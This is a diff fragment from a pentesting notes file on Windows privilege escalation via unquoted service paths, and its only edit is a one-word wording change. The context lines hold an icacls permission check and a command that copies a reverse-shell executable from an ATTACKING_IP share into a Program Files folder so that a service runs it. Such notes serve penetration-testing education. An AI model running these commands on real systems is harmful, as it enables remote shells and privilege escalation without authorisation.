v4resk/red-book/windows/privesc/services/unquoted-service-path.md

 icacls "C:\Program Files\A Subfolder\"
 ```

-If you can write to it, you can put your binary like:
+If you can write to it, you can place your binary like:
 ```powershell
 copy \\ATTACKING_IP\Share\reverse.exe C:\Program Files\A Subfolder\B.exe
 ```